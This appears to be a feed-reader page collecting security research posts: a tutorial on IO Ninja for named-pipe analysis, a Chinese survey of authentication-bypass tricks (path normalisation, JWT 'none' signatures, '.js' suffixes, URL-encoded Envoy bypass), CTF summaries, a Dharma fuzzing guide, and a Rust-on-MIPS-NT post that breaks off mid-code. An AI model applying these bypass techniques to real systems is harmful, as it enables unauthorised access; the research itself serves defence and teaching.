Reading view

There are new articles available, click to refresh the page.

MindShaRE: Using IO Ninja to Analyze NPFS

In this installment of our MindShaRE series, ZDI vulnerability researcher Michael DePlante describes how he uses the IO Ninja tool for reverse engineering and software analysis. According to its website, IO Ninja provides an “all-in-one terminal emulator, sniffer, and protocol analyzer.” The tool provides many options for researchers but can leave new users confused about where to begin. This blog provides a starting point for some of the most commonly used features. 


Looking at a new target can almost feel like meeting up with someone who’s selling their old car. I’m the type of person who would want to inspect the car for rust, rot, modifications, and other red flags before I waste the owner’s or my own time with a test drive. If the car isn’t super old, having an OBD reader (on-board diagnostics) may save you some time and money. After the initial inspection, a test drive can be critical to your decision. 

Much like checking out a used car, taking software for test drives as a researcher with the right tools is a wonderful way to find issues. In this blog post, I would like to highlight a tool that I have found incredibly handy to have in my lab – IO Ninja.

Lately, I have been interested in antivirus products, mainly looking for local privilege escalation vulnerabilities. After looking at several vendors including Avira, Bitdefender, ESET, Panda Security, Trend Micro, McAfee, and more, I started to notice that almost all of them utilize the Named Pipe Filesystem (NPFS). Furthermore, NPFS is used in many other product categories including virtualization, SCADA, license managers/updaters, etc.

I began doing some research and realized there were not many tools that let you locally sniff and connect to these named pipes easily in Windows. The Sysinternals suite has a tool called Pipelist and it works exactly as advertised. Pipelist can enumerate open pipes at runtime but can leave you in the dark about pipe connections that are opening and closing frequently. Another tool also in the Sysinternals suite called Process Explorer allows you to view open pipes but only shows them when you are actively monitoring a given process. IO Ninja fills the void with two great plugins it offers.

An Introduction to IO Ninja  

When you fire up IO Ninja and start a new session, you’re presented with an expansive list of plugins as shown below. I will be focusing on two of the plugins under the “File Systems” section in this blog: Pipe Monitor and Pipe Server.  

Before starting a new session, you may need to check the “Run as Administrator” box if the pipes you want to interact with require elevated privileges to read or write. You can inspect the permissions on a given pipe with the accesschk tool from the Sysinternals Suite:

The powerful Pipe Monitor plugin in IO Ninja allows you to record communication, as well as apply filters to the log. The Pipe Server plugin allows you to connect to the client side of a pipe. 

IO Ninja: Pipe Monitor

The following screenshot provides a look at the Pipe Monitor plugin that comes by default with IO Ninja.

In the above screenshot, I added a process filter (*chrome*) and started recording before I opened the application. You can also filter on a filename ( name of the pipe), PID, or file ID. After starting Chrome, data started flowing between several pipe instances. This is a terrific way to dynamically gather an understanding of what data is going through each pipe and when those pipes are opened and closed. I found this helpful when interacting with antivirus agents and wanted to know what pipes were being opened or closed based on certain actions from the user, such as performing a system scan or update. It can also be interesting to see the content going across the pipe, especially if it contains sensitive data and the pipe has a weak ACL.

It can also help a developer debug an application and find issues in real-time like unanswered pipe connections or permission issues as shown below. 

Using IO Ninja’s find text/bin feature to search for “cannot find”, I was able to identify several connections in the log below where the client side of a connection could not find the server side. In my experience, many applications make these unanswered connections out of the box.

What made this interesting was that the process updatesrv.exe, running as NT AUTHORITY\SYSTEM, tried to open the client side of a named pipe but failed with ERROR_FILE_NOT_FOUND. We can fill the void by creating our own server with the name it is looking for and then triggering the client connection by initiating an update within the user interface.

As a low privileged user, I am now able to send arbitrary data to a highly privileged process using the Pipe Server plugin. This could potentially result in a privilege escalation vulnerability, depending on how the privileged process handles the data I am sending it.

IO Ninja: Pipe Server

The Pipe Server plugin is powerful as it allows you to send data to specific client connections from the server side of a pipe. The GUI in IO Ninja allows you to select which conversation you’d like to interact with by selecting from a drop-down list of Client IDs. Just like with the Pipe Monitor plugin, you can apply filters to clean up the log. Below you’ll find a visual from the Pipe Server plugin after starting the server end of a pipe and getting a few client connections.  

In the bottom right of the previous image, you can see the handy packet library. Other related IO Ninja features include a built-in hex editor, file- and script-based transmission, and packet templating via the packet template editor.

The packet template editor allows you to create packet fields and script custom actions using the Jancy scripting language. Fields are visualized in the property grid as shown above on the bottom left-hand side of the image, where they can be edited. This feature makes it significantly easier to create and modify packets when compared to just using a hex editor.

Conclusion

This post only scratches the surface of what IO Ninja can do by highlighting just two of the plugins offered. The tool is scriptable and provides an IDE that encourages users to build, extend or modify existing plugins.  The plugins are open source and available in a link listed at the end of the blog. I hope that this post inspires you to take a closer look at NPFS as well as the IO Ninja tool and the other plugins it offers.

Keep an eye out for future blogs where I will go into more detail on vulnerabilities I have found in this area. Until then, you can follow me @izobashi and the team @thezdi on Twitter for the latest in exploit techniques and security patches.

Additional information about IO Ninja can be found on their website. All of IO Ninja’s plugins are open source and available here.

Additional References

If you are interested in learning more you can also check out the following resources which I found helpful.

Microsoft - Documentation: Named Pipes

Gil Cohen - Call the plumber: You have a leak in your named pipe

0xcsandker - Offensive Windows IPC Internals 1: Named Pipes

MindShaRE: Using IO Ninja to Analyze NPFS

Identity Security Authentication Vulnerability

Identity Security Authentication Vulnerability

拿到一个系统大多很多情况下只有一个登录入口,如果想进一步得到较为高危的漏洞,只能去寻找权限校验相关的漏洞,再结合后台洞,最终得到一个较为满意的漏洞。

这里列出一些较为常见的安全认证配置:

  • Spring Security
  • Apache Shiro
  • 服务器本身(Tomcat、Nginx、Apache)401 认证
  • Tomcat 安全认证(结合web.xml) 无需代码实现
  • JSON Web Token

以上只是简单列出了一些笔者见过常见的安全认证配置组件。不同的鉴权组件存在异同的审计思路。

一、寻找未授权

这是笔者第首先会入手去看的点,毕竟如果能直接从未授权的点进入,就没必要硬刚鉴权逻辑了。

1.一些第三方组件大概率为未授权应用

druid、webservice、swagger等内置于程序中的应用大多被开发者设计为无需权限校验接口。

Identity Security Authentication Vulnerability

第三方组件本身又存在历史漏洞,且以jar包的形式内置于应用中,低版本的情况很常见。

利用druid的未授权获取了管理员session

Identity Security Authentication Vulnerability

2.安全认证框架配置中存在的未授权接口

出于某种功能需求,开发者会讲一些功能接口配置无需权限

web.xml

细心查看配置文件中各个Filter、Servlet、Listener ,可能有意想不到的收获

Identity Security Authentication Vulnerability

spring-mvc.xml

这里是以拦截器的方式对外开放了未授权请求处理

Identity Security Authentication Vulnerability

tomcat 安全配置

Identity Security Authentication Vulnerability

配置类

Apache Shiro、Spring Security等支持以@Configuare注解方式配置权限认证,只要按照配置去寻找,当然以上框架也支持配置文件方式配置,寻找思路一样

Identity Security Authentication Vulnerability

3.未授权访问接口配合ssrf获取localhost本身需鉴权服务

一些多服务组件中,存在服务之间的相互调用,服务之间的相互调用或许不需要身份校验,或者已经配置了静态的身份凭证,又或者通过访问者IP是否为127.0.0.1来进行鉴权。这时我们需要一个SSRF漏洞即可绕过权限验证。

很经典的为Apache Module mod_proxy 场景绕过:SSRF CVE-2021-4043.

二、安全认证框架本身存在鉴权漏洞

1.Apache Shiro

Shiro相关的权限绕过漏洞,我觉得可以归类到下面的路径归一化的问题上

2.Spring Security

某些配置下,存在权限绕过,当配置文件放行了/**/.js 时

Identity Security Authentication Vulnerability

Identity Security Authentication Vulnerability

3.JWT 存在的安全风险

  • 敏感信息泄露
  • 未校验签名
  • 签名算法可被修改为none
  • 签名密钥爆破
  • 修改非对称密码算法为对称密码算法
  • 伪造密钥(CVE-2018-0114)

jwt测试工具:https://github.com/ticarpi/jwt_tool

三、静态资源访问

静态资源css、js等文件访问往往不需要权限,开发者可能讲鉴权逻辑放在Filter里,当我们在原有路由基础上添加.js 后缀时,即可绕过验证

Identity Security Authentication Vulnerability

这里可能会有一个问题,添加了js后缀后是否还能正常匹配到处理类呢?在spring应用里是可以的,默认配置下的spirng configurePathMatch支持添加后缀匹配路由,如果想开启后缀匹配模式,需要手动重写configurePathMatch方法

Identity Security Authentication Vulnerability

四、路径归一化问题

1.简单定义

两套组件或应用对同一个 URI 解析,或者说处理的不一致,导致路径归一化问题的产生。

orange 的 breaking parser logic 在 2018 黑帽大会上的演讲议题,后续许多路径归一化的安全问题,都是延伸自他的 PPT

2.Shiro 权限绕过漏洞

一个很经典的路径归一化问题,导致 权限的绕过,比如Shiro CVE-2020-1957

针对用户访问的资源地址,也就是 URI 地址,shiro 的解析和 spring 的解析不一致,shiro 的 Ant 中的*通配符匹配是不能匹配这个 URI 的/test/admin/page/。shiro 认为它是一个路径,所以绕过了/test/admin/*这个 ACL。而 spring 认为/test/admin/page 和/test/admin/page/是一样的,它们能在 spring中获取到同样的资源。

3.CVE-2021-21982 VMware CarbonBlack Workstation

算是一个老1day了,组件本身身份验证通过Spring Security + JWT来实现。且存在两套url的处理组件:Envoy 以及 Springboot。

PS:Envoy 是专为大型现代 SOA(面向服务架构)架构设计的 L7 代理和通信总线。

通过diff可以定位到漏洞点,一个本地获取token的接口

Identity Security Authentication Vulnerability

但是我们通过外网直接访问无法获取到token

Identity Security Authentication Vulnerability

简单了解一下组建的基本架构

Identity Security Authentication Vulnerability

抓一下envoy 与本机服务的通信 rr yyds

./tcpdump -i lo -nn -s0 -w lo1.cap -v

envoy 本身起到一个请求转发作用,可以精确匹配到协议 ip 端口 url路径等,指定很详细的路由转发规则,且可以对请求进行转发和修改

Identity Security Authentication Vulnerability

url编码即可绕过envoy的转发规则,POC如下:

Identity Security Authentication Vulnerability

总结:由于envoy转发规则不能匹配URL编码,但Springboot可以理解,两个组件对url的理解不同,最终导致漏洞产生。

3.Other

扩展一下思路,当存在一个或者多个代码逻辑处理url时,由于对编码,通配符,"/",";" 等处理的不同,极有可能造成安全问题。

五、Apache、Nginx、Jetty、HAProxy 等

Chybeta在其知识星球分享了很多:

Nginx 场景绕过之一: URL white spaces + Gunicorn

https://articles.zsxq.com/id_whpewmqqocrw.html

Nginx 场景绕过之二:斜杠(trailing slash) 与 #

https://articles.zsxq.com/id_jb6bwow4zf5p.html

Nginx 场景绕过之三:斜杠(trailing slash) 与 ;

https://articles.zsxq.com/id_whg6hb68xkbd.html

HAProxy 场景绕过之一: CVE-2021-40346

https://articles.zsxq.com/id_ftx67ig4w57u.html

利用hop-by-hop绕过:结合CVE-2021-33197

https://articles.zsxq.com/id_rfsu4pm43qno.html

Squid 场景绕过之一: URN bypass ACL

https://articles.zsxq.com/id_ihsdxmrapasa.html

Apache Module mod_proxy 场景绕过:SSRF CVE-2021-4043.

六、简单的fuzz测试

造成权限绕过的根本原因可能有多种,但是不妨碍我们总结出一些常见的绕过方式,编码、插入某些特定字符、添加后缀等方式。远海曾公布一个权限绕过的fuzz字典:

Identity Security Authentication Vulnerability

七、参考链接

https://wx.zsxq.com/dweb2/index/group/555848225184

https://www.vmware.com/security/advisories/VMSA-2021-0005.html

https://cloud.tencent.com/developer/article/1552824

ECW 2021 - WriteUp

For the European Cyber Week CTF 2021 Thalium created some challenges in our core competencies: reverse and exploitation. This blog post presents some of the write-ups:

Thalium’s challenges have been less resolved than others. They were not that difficult, but probably a bit more unexpected. A few additional challenges designed by Thalium are:

NT objects access tracing

Draw me a map As homework during the lockdown, I wanted to automate the attack surface analysis of a target on Windows. The main objective was to construct a view of a software architecture to highlight the attack surface (whether remote or local). The software architecture can be composed of several elements: processes privileges ipc etc Usually, software architecture analysis is done with tools that give a view at a specific time (ProcessHacker, WinObjEx, etc).

SSTIC : how to setup a ctf win10 pwn user environment

Introduction This post aims to present how to easily setup a lightweight secure user pwning environment for Windows. From your binary challenge communicating with stdin/stdout, this environment provides a multi-client broker listening on a socket, redirecting it to the IO of your binary, and executing it in a jail. This environment is mainly based on the project AppJaillauncher-rs from trailofbits, with some security fixes and some tips to easily setup the RW rights to the system files from the jail.

Cyber Apocalypse 2021 5/5 - Artillery

Artillery was a web challenge of the Cyber Apocalypse 2021 CTF organized by HackTheBox. We were given the source code of the server to help us solve the challenge. This challenge was a nice opportunity to learn more about XXE vulnerabilities.

Cyber Apocalypse 2021 1/5 - PWN challenges

Thalium participated in the Cyber Apocalypse 2021 CTF organized last week by HackTheBox. It was a great success with 4,740 teams composed of around 10,000 hackers from all over the world. Our team finished in fifth place and solved sixty out of the sixty-two challenges:

fig_scoreboard

This article explains how we solved each pwn challenge and what tools we used, it is written to be accessible to beginners:

Cyber Apocalypse 2021 4/5 - Discovery

One of the least solved challenges, yet probably not the most difficult one. It is a Hardware challenge, though it is significantly different from the other challenges of this category. The first thing to spot is that when starting the challenge machine, we have access to two network services:

  • an HTTP server, requesting an authentication
  • an AMQP broker, rabbitmq

Windows Memory Introspection with IceBox

Virtual Machine Introspection (VMI) is an extremely powerful technique to explore a guest OS. Directly acting on the hypervisor allows a stealth and precise control of the guest state, which means its CPU context as well as its memory. Basically, a common use case in VMI consists in (1) setting a breakpoint on an address, (2) wait for a break and (3) finally read some virtual memory. For example, to simply monitor the user file writing activity on Windows, just set a breakpoint on the NtWriteFile function in kernel land.

Getting Started with Icebox VMI

Icebox is a VMI (Virtual Machine Introspection) framework enabling you to stealthily trace and debug any kernel or user code system-wide. All Icebox source code can be found on our github page. Try Icebox Icebox now comes with full Python bindings enabling fast prototyping on top of VMI, whether you want to trace a user process or inspect the kernel internals. The core itself is in C++ and exposes most of its public functions into an icebox Python 3 module.

Introduction to Dharma - Part 1

While targeting Adobe Acrobat JavaScript APIs, we were not only focusing on performance and the number of cases generated per second, but also on effective generation of valid inputs that cover different functionalities and uncover new vulnerabilities.

Obtaining inputs from mutational-based input generators helped us in quickly generating random inputs; however due to the randomness of the mutations that were generated, great majority of that input was invalid.

So, we utilized a well-known grammar-based input generator called Dharma to produce inputs that are semantically reasonable and follow the syntactic rules of JavaScript.

In this blog post, we will explain what Dharma is, how to set it up and finally demonstrate how to use it to generate valid Adobe Acrobat JavaScript API calls which can be wrapped in PDF file format.


So, What is dharma?

Dharma was created by Mozilla in 2015. It's a tool used to create test cases for fuzzing of structured text inputs, such as markup and script. Dharma takes a custom high-level grammar format as input and produces random well-formed test cases as output.

Dharma can be installed from the following GitHub repo.


Why use Dharma?

By using Dharma, a fuzzer can generate inputs that are valid according to that grammar requirements. To generate an input using Dharma, the input model must be stated. It will be difficult to write a grammar files for a model that is proprietary, unknown, or very complex.

However, we do have knowledge of APIs and objects that we're targeting, by using the publicly available JavaScript API documentation provided by Adobe.


How to use Dharma?

Using dharma is straight forward, it takes a grammar file with dg extension and starts generating random inputs based on the grammar file that is provided.

A grammar file generally needs to contain 3 sections, and they are:

  1. Value

  2. Variable

  3. Variance

Note that the Variable section is not mandatory. Each section has a purpose and specifications,

The syntax to declare a section: %section% := section

  • The "value" section is where we define values that are interchangeable - think of it as an OR/SWITCH.

a value can be referenced in the grammar file using +value+, for example +cName+.

  • The "variable" section is where we define variables to be used as a context to be used in generating different code.

a variable can be referenced from the value section by using two exclamation marks

  • The "variance" section is where we put everything together.

if we run the previous example of the three sections, one of the generated files will be similar to the following JS code:

Building Grammar Files

In this section we'll walk through an example of how to build a grammar file based on a real life scenario. We will try to build a grammar file for the Thermometer object from Adobe javascript documentation.

%section% := variable

The Thermometer objects can be referenced through "app.thermometer" - which is the first thing we need to implement:

The easiest way to get a reference to the Thermometer object is from the app object (app.therometer):

%section% := value

Looking at the documentation of the Thermometer object, we can see that it has four properties:

We need to assign values properties based on their types.

In this case, the cancelled property's type is a boolean, Duration is number, text is a string and the value property is a number. That said, we'll have to implement getters and setters for these properties. The setter implementation should look similar to the following:

Now that we have implemented setters for the properties, Dharma will pick random setter definition from the defined therometer_setters.

For the value property, it will set a random number using +common:number+, a random character for the text property using +common:character+, a random number from 0 to 10000 for the duration property and a Boolean value for the cancelled property using +common:bool+.

Those values were referenced from a grammar file shipped with dharma called common.dg.

We're now done with the setters, next up is implementing the getters which is fairly easy. We can create a value with all the properties, and then another value to pick a random property from thermometer_properties:

In the above grammar we used x+common:digit+ to generate random JavaScript variables to store the properties values in it, for example, x1, x2, x3, …etc.

We're officially done with properties. Next we'll have to implement the methods. The Thermometer object has two methods - begin and end. Luckily, those two functions do not require any arguments passed:

We have everything implemented. One last thing we need to implement in the value section is the wrapper. The wrapper simply try/catch's the code generated:

Finally the variance section - which invokes the wrapper from the main:

%section% := variance

Putting it all together:

Running our grammar file, generates the following output:

The generated JS code can be then embedded into PDF files for testing. Or we can dump the generated code to a JS file by using ">>" from the cmd

Now let's move on to a more complex example - building a grammar file for the spell object.

We will use the same methodology we used above, starting with implementing getters/setters for the properties followed by implementing the methods. Looking at the documentation of the spell object properties:

%section% := value

Note that we will constantly use +fuzzlogics+ keyword, which is a reference from another grammar file that our fuzzer will use to place some random values.

In this case, we'll make the getter/setter implementation simpler. We'll have the setter set random values to any properties regardless of the type. The getter is almost the same as the example above:

Now we're going to implement the methods. To avoid spoiling the fun for you, we'll not implement all the methods in the spell object, just a few for demonstration purposes :)

These are all the methods for the spell object, each method takes a certain number of arguments with different types, so we need a value for each method. Let's start with spell.addDictionary() arguments:

Looking at addDictionary method, it takes three arguments, cFile, cName and bShow. The last argument (bShow) is optional, so we implemented two logics for addDictionary arguments to cover as many scenarios as we can. One with all three arguments and another with only two arguments since the last one is optional.

For the cFile argument, we're referencing an ASCII Unicode value from the fuzzlogics.dg (the dictionary we customly implemented for this purpose).

Now let's implement the spell.check() arguments.

spell.check() function takes two optional arguments, aDomain and aDictionary. So we can either pass aDomain only, aDictionary only, both or no arguments at all.

The first logic "{}" is no argument, the second one is both aDictionary and aDomain, the third one is aDomain, the last one is aDictionary only.

The same methodology is used for the rest of the methods, so we're not going to cover all available methods. The last thing we need to implement is the wrapper:

As we mentioned earlier, the wrapper is used to wrap everything between a try/catch so that any error would be suppressed. Finally, the variance section:

In the next part we will expand further into Dharma, focusing on a specific case study where Dharma was essential to the process of vulnerability discovery. Hopefully this introduction catches you up to speed with grammar fuzzing and its inner workings.

As always, happy hunting :)

Rust on MIPS64 Windows NT 4.0

Introduction

Some part of me has always been fascinated with coercing code to run in weird places. I scratch this itch a lot with my security research projects. These often lead me to writing shellcode to run in kernels or embedded hardware, sometimes with the only way being through an existing bug.

For those not familiar, shellcode is honestly hard to describe. I don’t know if there’s a very formal definition, but I’d describe it as code which can be run in an environment without any external dependencies. This often means it’s written directly in assembly, and directly interfaces with the system using syscalls. Usually the code can be relocated and often is represented as a flat image rather than a normal executable with multiple sections.

To me, this is extra fun as it’s effectively like operating systems development. You’re working in an environment where you need to bring most of what you need along with you. You probably want to minimize the dependencies you have on the system and libraries to increase compatibility and flexibility with the environments you run. You might have to bring your own allocator, make your own syscalls, maybe even make a scheduler if you are really trying to minimize impact.

Some of these things may seem silly, but when it comes to bypassing anti-viruses, exploit detection tools, and even mitigations, often the easiest thing to do is just avoid the common APIs that are hooked and monitored.

Streams

Before we get into it, it’s important to note that this work has been done over 3 different live streams on my Twitch! You can find these archived on my YouTube channel. Everything covered in this blog can be viewed as it happened in real time, mistakes, debugging, and all!

The 3 videos in question are:

Day 1 - Getting Rust running on Windows NT 4.0 MIPS64

Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS

Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying

Source

This project has spun off 3 open-source GitHub repos, one for the Rust on NT MIPS project in general, another for converting ELFs to flat images, and a final one for parsing .DBG symbol files for applying symbols to Binary Ninja or whatever tool you want symbols in! I’ve also documented the commit hashes for the repos as of this writing if things have changed since you’ve read this!

Rust on NT MIPS - 2028568

ELF loader - 30c77ca

DBG COFF parser - b7bcdbb

Don’t forget to follow me on socials and like and subscribe of course. Maybe eventually I can do research and education full time!~ Oh, also follow me on my Twitter @gamozolabs

MIPS on Windows NT

Windows NT actually has a pretty fascinating history of architecture support. It supported x86 as we know and love, but additionally it supported Alpha, ARM, and PowerPC. If you include the embedded versions of Windows there’s support for some even more exotic architectures.

MIPS is one of my favorite architectures as the simplicity makes it really fun to develop emulators for. As someone who writes a lot of emulators, it’s often one of my first targets during development, as I know it can be implemented in less than a day of work. Finding out that MIPS NT can run in QEMU was quite exciting for me. The first time I played around with this was maybe ~5 years ago, but recently I thought it’d be a fun project to demonstrate harnessing of targets for fuzzing. Not only does it have some hard problems in harnessing, as there are almost no existing tools for working with MIPS NT binaries, but it also leads us to some fun future projects where custom emulators can come into the picture!

There’s actually a fantastic series by Raymond Chen which I highly recommend you check out here.

There’s actually a few of these series by Raymond for various architectures on NT. They definitely don’t pull punches on details, definitely a fantastic read!

Running Windows NT 4.0 MIPS in QEMU

Getting NT 4.0 running in QEMU honestly isn’t too difficult. QEMU already supports the magnum machine, which runs on a R4000 MIPS processor, the first 64-bit MIPS processor, running an implementation of the MIPS III ISA. Unfortunately, out of the box it won’t quite run, as you need a BIOS/bootloader capable of booting Windows, maybe it’s video BIOS, I don’t know. You can find this here. Simply extract the file, and rename NTPROM.RAW to mipsel_bios.bin.

Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s a bit of configuration you need to do in the BIOS to get it to detect your CD, and you need to configure your MAC address otherwise networking in NT doesn’t seem to work beyond a DHCP lease. Anyways, you can find more details about getting MIPS NT 4.0 running in QEMU here.

I also cover the process I use, and include my run.sh script here.

#!/bin/sh

ISO="winnt40wks_sp1_en.iso"
#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"

qemu-system-mips64el \
    -M magnum \
    -cpu VR5432 \
    -m 128 \
    -net nic \
    -net user,hostfwd=tcp::5555-:42069 \
    -global ds1225y.filename=nvram \
    -global ds1225y.size=8200 \
    -L . \
    -hda nt4.qcow2 \
    -cdrom "$ISO"

Windows NT 4.0 running in QEMU MIPS

Getting code running on Windows NT 4.0

Surprisingly, a decent enough environment for development is readily available for NT 4.0 on MIPS. This includes symbols (included under SUPPORT/DEBUG/MIPS/SYMBOLS on the original ISO), as well as debugging tools such as ntsd, cdb and mipskd (command-line versions of the WinDbg command interface you may be familiar with), and the cherry on top is a fully working Visual Studio 4.0 install that will work right inside the MIPS guest!

With Visual Studio 4.0 we can use both the full IDE experience for building projects, but also the command line cl.exe compiler and nmake, my preferred Windows development experience. I did however use VS4 for the editor as I’m not using 1996 notepad.exe for writing code!

Unless you’re doing something really fancy, you’ll be surprised to find much of the NT APIs just work out of the box on NT4. This includes your standard way of interacting with sockets, threads, process manipulation, etc. A few years ago I wrote a snapshotting tool that used all the APIs that I would in a modern tool to dump virtual memory regions, read them, and read register contexts. It’s pretty neat!

Nevertheless, if you’re writing C or C++, other than maybe forgetting about variables having to be declared at the start of a scope, or not using your bleeding edge Windows 10 APIs, it’s really no different from modern Windows development. At least… for low level projects.

Rust and Me

After about ~10 years of writing -ansi -pedantic C, where I followed all the old fashioned rules of declaring variables at the start of scopes, verbose syntax, etc, I never would have thought I would find myself writing in a higher-level language. I dabbled in C++ but I really didn’t like the abstractions and confusion it brought, although that was arguably when I was a bit less experienced.

Nevertheless, I found myself absolutely falling in love with Rust. This was a pretty big deal for me as I have very strong requirements about understanding exactly what sort of assembly is generated from the code I write. I spend a lot of time optimizing and squeezing every bit of performance out of my code, and not having this would ruin a language for me. Something about Rust and its model of abstractions (traits) makes it actually pretty obvious what code will be generated, even for things like generics.

The first project I did in Rust was porting my hobby OS to it. Definitely a “thrown into the deep end” style project, but if Rust wasn’t suitable for operating systems development, it definitely wasn’t going to be a language I personally would want to invest in. However… it honestly worked great. After reading the Rust book, I was able to port my OS which consisted of a small hypervisor, 10gbit networking stack, and some fancy memory management, in less than a week.

Anyways, rant aside, as a low-level optimization nerd, there was nothing about Rust, even in 2016, that raised red flags about being able to replace all of my C in it. Of course, I have many complaints and many things I would change or want added to Rust, but that’s going to be the case with any language… I’m picky.

Rust on MIPS NT 4.0

Well, I do all of my projects in Rust now. Even little scripts I’d usually write in Python I often find myself grabbing Rust for. I’m comfortable with using Rust for pretty much any project at this point, that I decided that for a long-ish term stream project (ultimately a snapshot fuzzer for NT), I would want to do this in Rust.

The very first thought that comes to mind is to just build a MIPS executable from Rust, and just… run it. Well, that would be great, but unfortunately there were a few hiccups.

Rust on weird targets

Rust actually has pretty good support for weird targets. I mean, I guess we’re really just relying on, or limited by cough, LLVM. Not only can you simply pick your target by the --target triple argument to Rust and Cargo, but also when you really need control you can define a target specification. This gives you a large amount of control about the code generated.

For example:

pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json

Will give you the JSON spec for my native system, x86_64-unknown-linux-gnu

{
  "arch": "x86_64",
  "cpu": "x86-64",
  "crt-static-respected": true,
  "data-layout": "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128",
  "dynamic-linking": true,
  "env": "gnu",
  "executables": true,
  "has-elf-tls": true,
  "has-rpath": true,
  "is-builtin": true,
  "llvm-target": "x86_64-unknown-linux-gnu",
  "max-atomic-width": 64,
  "os": "linux",
  "position-independent-executables": true,
  "pre-link-args": {
    "gcc": [
      "-m64"
    ]
  },
  "relro-level": "full",
  "stack-probes": {
    "kind": "call"
  },
  "supported-sanitizers": [
    "address",
    "cfi",
    "leak",
    "memory",
    "thread"
  ],
  "target-family": [
    "unix"
  ],
  "target-pointer-width": "64"
}

As you can see, there’s a lot of control you have here. There’s plenty more options than just in this JSON as well. You can adjust your ABIs, data layout, calling conventions, output binary types, stack probes, atomic support, and so many more. This JSON can be modified as you need and you can then pass in the JSON as --target <your target json.json> to Rust, and it “just works”.

I’ve used this to generate code for targets Rust doesn’t support, like Android on MIPS (okay there’s maybe a bit of a pattern to my projects here).

Back to Rust on MIPS NT

Anyways, back to Rust on MIPS NT. Lets just make a custom spec and get LLVM to generate us a nice portable executable (PE, the .exe format of Windows)!

Should be easy!

Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran into an LLVM bug.

It took us some time (well, Twitch chat eventually read the LLVM code instead of me guessing) to find that the correct target triple if we wanted to get LLVM to generate a PE for MIPS would be mips64el-pc-windows-msvccoff. It’s a weird triple (mainly the coff suffix), but this is the only path we were able to find which would cause LLVM to attempt to generate a PE for MIPS. It definitely seems a bit biased towards making an ELF, but this triple indeed works…

It works at getting LLVM to try to emit a PE, but unfortunately this feature is not implemented. Specifically, inside LLVM they will generate the MIPS code, and then attempt to create the PE by calling createMCObjectStreamer. This function doesn’t actually check any of the function pointers before invoking them, and it turns out that the COFF streamer defaults to NULL, and for MIPS it’s not implemented.

Thus… we get a friendly jump to NULL:

LLVM crash backtrace in GDB

Can we add support?

The obvious answer is to quickly take the generic implementation of PE generation in LLVM and make it work for MIPS and upstream it. Well, after a deep 30 second analysis of LLVM code, it looks like this would be more work than I wanted to invest, and after all the issues up to this point my concerns were that it wouldn’t be the end of the problems.

I guess we have ELFs

Well, that leaves us with really one format that LLVM will generate MIPS for us, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I decided the best way to go would simply be to flatten the ELF into an in-memory representation and make my own file format that’s easy to write a loader for.

You might think to just use a linker script for this, or to do some magic objcopy to rip out code, but unfortunately both of these have limitations. Linker scripts are fail-open, meaning if you do not specify what happens with a second, it will just “silently” be added wherever the linker would have put it by default. There (to my knowledge) is no strict mode, which means if Rust or LLVM decide to emit some section name you are not expecting, you might end up with code not being laid out as you expect.

objcopy cannot output zero-initialized BSS sections as they would be represented in-memory, so once again, this leads to an unexpected section popping up and breaking the model you expected.

Of course, with enough effort and being picky you can get a linker script to output whatever format you want, but honestly they kinda just suck to write.

Instead, I decided to just write an ELF flattener. It wouldn’t handle relocations, imports, exports, permissions or really anything. It wouldn’t even care about the architecture of the ELF or the payload. Simply, go through each LOAD section, place them at their desired address, and pad the space between them with zeros. This will give a flat in-memory representation of the binary as it would be loaded without relocations. It doesn’t matter if there’s some crazy custom assembly or sections defined, the LOAD sections are all that matters.

This tool is honestly relatively valuable for other things, as it can also flatten core dumps into a flat file if you want to inspect a core dump, which is also an ELF, with your own tooling. I’ve written this ELF loader a handful of times that I thought it would be worthwhile writing my best version if this.

The loader simply parses the absolutely required information from the ELF. This includes checking \x7FELF magic, reading the endianness (affects the ELF integer endianness), and the bitness (also affects ELF layout). Any other information in the header is ignored. Then I parse the program headers, look for any LOAD sections (sections indicated by the ELF to be loaded into memory) and make the flat file.

The ELF format is fairly simple, and the LOAD sections contain information about the permissions, virtual address, virtual size (in-memory size), file offset (location of data to initialize the memory to), and the file size (can often be less than the memory size, thus any uninitialized bytes are padded to virtual memory size with zeros).

By concatenating these sections with the correct padding, viola, we have an in-memory representation of the ELF.

I decided to make a custom FELF (“Falk ELF”) format that indicated where this blob need to be loaded into memory, and the entry point address that needed to be jumped into to start execution.

FELF0001 - Magic header
entry    - 64-bit little endian integer of the entry point address
base     - 64-bit little endian integer of the base address to load the image
<image>  - Rest of the file is the raw image, to be loaded at `base` and jumped
           into at `entry`

Simple! You can find the source code to this tool at My GitHub for elfloader. This tool also has support for making a raw file, and picking a custom base, not for relocations, but for padding out the image. For example, if you have the core dump of a QEMU guest, you can run it through this tool with elfloader --binary --base=0 <coredump> and it will produce a flat file with no headers representing all physical memory with MMIO holes and gaps padded with zero bytes. You can then mmap() the file and write your own tools to browse through a guests physical memory (or virtual if you write page table walking code)! Maybe this is a problem I only find myself running into often, but within a few days of writing this I’ve even had a coworker use it.

Anyways, enough selling you on this first cool tool we produced. We can turn an ELF into an in-memory initial representation, woohoo.

FELF loader

To load a FELF for execution on Windows, we’ll of course need to write a loader. Of course we could convert the FELF into a PE, but at this point it’s less effort for us to just use the VC4.0 installation in our guest to write a very tiny loader. All we have to do is read a file, parse a simple header, VirtualAlloc() some RWX memory at the target address, copy the payload to the memory, and jump to entry!

Unfortunately, this is where it started to start to get dicey. I don’t know if it’s my window manager, QEMU, or Windows, but very frequently my mouse would start randomly jumping around in the VM. This meant that I pretty much had to do all of my development and testing in the VM with only the keyboard. So, we immediately scrapped the idea of loading a FELF from disk, and went for network loading.

Remote code execution

As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we learned the hard way that non-unicast MAC addresses randomly generated by DuckDuckGo indeed fail in a very hard to debug way), we had access to our host machine (and the internet) in the guest.

Why load from disk which would require shutting down the VM to mount the disk and copy the file into, when we could just make this a remote loader. So, that’s what we did!

We wrote a very simple client that when invoked, would connect to the server, download a FELF, load it, and execute it. This was small enough that developing this inside the VM in VC4.0 was totally fine.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
